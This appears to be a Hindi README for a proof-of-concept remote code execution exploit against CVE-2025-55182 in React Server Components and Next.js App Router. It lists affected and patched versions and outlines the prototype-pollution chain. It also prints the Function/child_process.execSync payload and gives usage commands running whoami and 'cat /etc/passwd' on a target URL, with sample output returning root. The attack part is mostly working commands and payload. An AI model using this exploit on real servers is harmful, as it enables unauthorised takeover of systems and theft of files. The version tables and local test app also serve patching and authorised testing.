
CVE‑2025‑55182 के लिए Proof-of-Concept RCE जो Next.js App Router पर React Flight प्रोटोकॉल का शोषण करता है।
| Next.js | React |
|---|
| 14.3.0-canary.77 to 15.0.4 | 19.0.0 |
| 15.1.1-canary.0 to 15.1.8 | 19.1.0 |
| 15.2.0-canary.0 to 15.2.5 | 19.1.1 |
| 15.3.0-canary.0 to 15.3.5 | 19.2.0 |
| 15.4.0-canary.0 to 15.4.7 | |
| 15.5.1-canary.0 to 15.5.6 | |
| 16.0.0-canary.0 to 16.0.6 |
| Next.js |
|---|
| 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+ |
Chunk संदर्भ प्राप्त करने के लिए $@ का उपयोग करता है$1:__proto__:then के माध्यम से .then को Chunk.prototype.then से ओवरराइट करता हैinitializeModelChunk को ट्रिगर करने के लिए status को resolved_model पर सेट करता है$B1337 का उपयोग करता है_formData.get को Function कंस्ट्रक्टर की ओर इंगित करता है_prefix में निष्पादित करने के लिए JS कोड होता हैकोड इसके माध्यम से मूल्यांकित किया जाता है:
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")
pip install -r requirements.txt
python cve_2025_55182_poc.py https://target.com --check-only
# Default command (id)
python cve_2025_55182_poc.py https://target.com
# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"
| विकल्प | विवरण |
|---|---|
url | लक्ष्य URL (आवश्यक) |
-c, --command | निष्पादित करने का कमांड (डिफ़ॉल्ट: id) |
--check-only | केवल भेद्यता की जाँच करें |
-t, --timeout | सेकंड में टाइमआउट (डिफ़ॉल्ट: 15) |
-v, --verbose | विस्तृत आउटपुट |
--raw | कच्चा प्रतिक्रिया दिखाएं |
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000
+======================================================================+
| CVE-2025-55182 - React Server Components RCE |
| React Flight Protocol Deserialization Vulnerability |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01
[*] Target: http://localhost:3000
[*] Timeout: 15s
[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received
[2/2] Executing command: whoami
[+] Payload sent!
============================================================
RESULT: whoami
============================================================
root
============================================================
CVE-2025-55182/
├── cve_2025_55182_poc.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # Documentation
└── vulnerable-app/ # Vulnerable Next.js app for testing
├── package.json
├── next.config.js
└── app/
├── layout.js
├── page.js
└── actions.js
⚠️ यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इस उपकरण का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।